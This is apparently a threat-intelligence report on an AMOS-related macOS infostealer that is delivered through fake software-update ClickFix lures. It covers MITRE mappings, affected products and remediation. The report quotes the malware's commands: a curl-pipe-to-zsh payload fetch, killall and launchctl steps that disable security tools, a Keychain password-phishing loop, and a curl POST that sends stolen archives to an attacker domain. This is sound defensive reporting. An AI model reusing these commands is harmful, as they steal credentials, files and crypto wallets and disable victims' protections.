Threat reportMalwareTL-2026-2421
AMOS-Related macOS Stealer Distributed via Fake Software Updates ("Catching macOS Stealers in the Wild")
AMOS-Related macOS Stealer Distributed via Fake Software (TL-2026-2421) is a high-severity malware campaign, first published 2026-04-01. It is attributed to AMOS Operators (Russia) with medium confidence, affects Apple macOS, maps to 16 MITRE ATT&CK techniques (T1005, T1027, T1036), and is covered by 9 detection rules and 21 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 16MITRE ATT&CK
- Actors
- 1AMOS Operators
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 21Indicators of compromise
Key facts for TL-2026-2421
- Threat ID
- TL-2026-2421
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution
- AMOS Operators
- Attribution confidence
- MEDIUM
- Nation-state nexus
- Russia
- Motivation
- FINANCIAL
- Detection rules
- 9
- Indicators of compromise
- 21
Malware and tooling in AMOS-Related macOS Stealer Distributed via Fake Software
Malware and tooling: AMOS, AMOS Stealer (Atomic Stealer), BlockBlock, Little Snitch, LuLu
How AMOS-Related macOS Stealer Distributed via Fake Software works
A macOS infostealer sample, assessed as probably related to Atomic Stealer (AMOS), is distributed via a ClickFix-style fake software update lure hosted on a Squarespace subdomain, then terminates Little Snitch/BlockBlock/LuLu, phishes the local account password against the Keychain, and exfiltrates browser data, Apple Notes, documents, and 256 targeted cryptocurrency wallet extensions.
Objective-See's Patrick Wardle team (analysis authored by Pablo Redondo Castro, published 2026-04-01) documented a macOS infostealer sample assessed as probably related to Atomic Stealer (AMOS) based on shared Squarespace-hosted lure infrastructure previously seen in AMOS campaigns. Victims land on a fake software-update page (Mac-force.squarespace.com) that instructs them to copy and paste a Terminal command — a ClickFix-pattern lure: `curl -LsfSk $(echo '[base64]'|base64 -D)| zsh`. The decoded command pulls a second-stage payload from rvdownloads.com/frozenfix/update via zsh.
Before acting, the malware performs anti-analysis checks, calling `system_profiler` and inspecting the output for VM/sandbox indicators — strings such as "QEMU", "VMware", "KVM", specific hardware serial numbers ("Z31FHXYQ0J", "C07T508TG1J2", "C02TM2ZBHX87"), "Chip: Unknown", and "Intel Core 2" processors that would indicate a virtualized analysis environment rather than a real victim Mac. The payload itself is heavily obfuscated: string literals are stored as arrays of numbers reconstructed at runtime by three custom decoder functions (`ssooouzowk()`, `uyvhofylsr()`, `ljmhoouy()`) using subtraction/addition/offset-subtraction arithmetic, backed by over 400 encoded variables named `gmeaaapd0` through `gmeaaapd434`, and driven by obfuscated inline AppleScript.
Once running, the malware actively neutralizes three well-known macOS security tools before continuing: it force-kills Little Snitch and BlockBlock (`killall -9 "Little Snitch"`, `killall -9 "BlockBlock"`) and unloads LuLu's LaunchAgent (`launchctl unload ~/Library/LaunchAgents/com.objective-see.lulu.plist`). It then displays a fake system dialog claiming "Application wants to install helper" to phish the local account password, validating each entry against the local Keychain via `security find-generic-password -ga 'Safari' -w` in a loop until the correct password is captured, and writes the harvested password to `~/.pwd` in plaintext.
With the captured password it escalates to extract Safari Keychain items and pulls login data, cookies, web data, and local extension settings from Chrome, Brave Browser, Microsoft Edge, Opera Software, and Firefox. It also copies the Apple Notes database (`~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`) and note attachments, and harvests desktop/document files (`.txt, .pdf, .doc, .docx, .xls, .xlsx, .key, .pages, .numbers`) up to a 30MB cap. Separately it enumerates 256 cryptocurrency wallet browser-extension IDs (including MetaMask, Phantom, Coinbase Wallet, Binance Wallet, TerraStation, and OKX Wallet) to steal wallet extension storage. Stolen artifacts are archived with `tar` and exfiltrated via `curl -X POST -F 'file=@/tmp/archive.tar.gz' https://laislivon.com/upload` — a domain the researchers note is "related to previous AMOS campaigns."
For persistence, the malware drops a LaunchAgent at `~/Library/LaunchAgents/com.apple.mdworker.plist`, a filename chosen to masquerade as a legitimate Spotlight-related component, with an internal label of `com.apple.systemupdate` and `RunAtLoad`/`KeepAlive` both set true, embedding the complete obfuscated AppleScript stealer inline so it reruns on every login.
MITRE ATT&CK techniques used in TL-2026-2421
Collection
T1005 Data from Local System; T1119 Automated Collection; T1560 Archive Collected Data
Defense Evasion
T1027 Obfuscated Files or Information; T1036 Masquerading; T1497 Virtualization/Sandbox Evasion
Credential Access
T1056 Input Capture; T1552 Unsecured Credentials; T1555 Credentials from Password Stores
Execution
T1059 Command and Scripting Interpreter; T1204 User Execution
Command and Control
T1071 Application Layer Protocol
Discovery
Persistence
T1543 Create or Modify System Process
Impact
defense-impairment
Affected products and versions in AMOS-Related macOS Stealer Distributed via Fake Software
- Apple — macOS
Vulnerable versions: All versions (social-engineering delivered malware, not a macOS vulnerability) - Objective-See — Little Snitch / BlockBlock / LuLu (third-party macOS security tools, targeted for termination)
Vulnerable versions: All versions lacking self-defense/tamper protection against killall/launchctl unload - Multiple (Google, Brave Software, Microsoft, Opera, Mozilla) — Chrome, Brave Browser, Microsoft Edge, Opera, Firefox (browser profile data targeted)
Vulnerable versions: All versions storing Login Data/cookies/web data in default profile paths
Remediation for AMOS-Related macOS Stealer Distributed via Fake Software
Immediate actions
- Block network access to laislivon.com and rvdownloads.com at DNS/perimeter
- Hunt for ~/Library/LaunchAgents/com.apple.mdworker.plist and label com.apple.systemupdate across managed macOS fleets
- Hunt for the marker files ~/.pwd, ~/.username, ~/.marker and the dropped /tmp/helper artifact
- Educate users never to copy/paste Terminal commands from web pages, update prompts, or CAPTCHA/verification lures (ClickFix pattern)
Workarounds
- Restrict user-writable access to ~/Library/LaunchAgents where feasible and alert on new LaunchAgent creation
- Disable pasting of shell commands into Terminal.app from browser clipboard where MDM tooling supports it
Longer-term hardening
- Deploy EDR with behavioral detection for killall targeting security-tool process names and launchctl unload of third-party LaunchAgents
- Enforce Gatekeeper/notarization and restrict execution of unsigned/ad-hoc-signed binaries downloaded via curl
- Monitor for osascript/AppleScript invocations chained immediately after curl network activity
- Deploy tamper-protection/self-defense monitoring for Little Snitch, BlockBlock, and LuLu so their termination triggers an alert
Timeline of AMOS-Related macOS Stealer Distributed via Fake Software
- Objective-See publishes "Catching macOS Stealers in the Wild" (author Pablo Redondo Castro), documenting the sample and assessing it as probably AMOS-related.
- Collected data is tar-archived and uploaded via HTTP POST to https://laislivon.com/upload, a domain researchers link to prior AMOS campaigns.
- Stealer installs ~/Library/LaunchAgents/com.apple.mdworker.plist (label com.apple.systemupdate, RunAtLoad/KeepAlive true) embedding the full obfuscated AppleScript so it reruns on every login.
- Stealer harvests Safari Keychain items, Chrome/Brave/Edge/Opera/Firefox browser data, the Apple Notes database, local documents, and 256 targeted cryptocurrency wallet extension identifiers.
- Fake "Application wants to install helper" password dialog is shown and looped until the entered value validates against the local Keychain; password written to ~/.pwd.
- Malware force-kills Little Snitch and BlockBlock via killall -9 and unloads LuLu's LaunchAgent via launchctl unload.
- Malware calls system_profiler and inspects output for QEMU/VMware/KVM strings and known VM hardware serial numbers before continuing execution.
- Pasted command decodes and pipes to zsh, fetching the second-stage stealer payload from rvdownloads.com/frozenfix/update.
- Victim lands on fake software-update page at Mac-force.squarespace.com and is directed to copy/paste a Terminal command (ClickFix pattern).
Sources cited for AMOS-Related macOS Stealer Distributed via Fake Software
- Catching macOS Stealers in the Wild
- macOS Stealer in the Wild: AMOS-Linked Fake Updates
- Atomic macOS Stealer includes a backdoor for persistent access
- MacOS Infostealer AMOS Evolves with Backdoor for Persistent Access
- ClickFix campaign uses fake macOS utilities lures to deliver infostealers
- Over 250 ClickFix Domains Use Browser Fingerprinting to Hide macOS Malware Lures
Detection coverage for TL-2026-2421
As of 2026-04-01, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2421 across Splunk SPL, Microsoft KQL and Sigma, covering 21 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.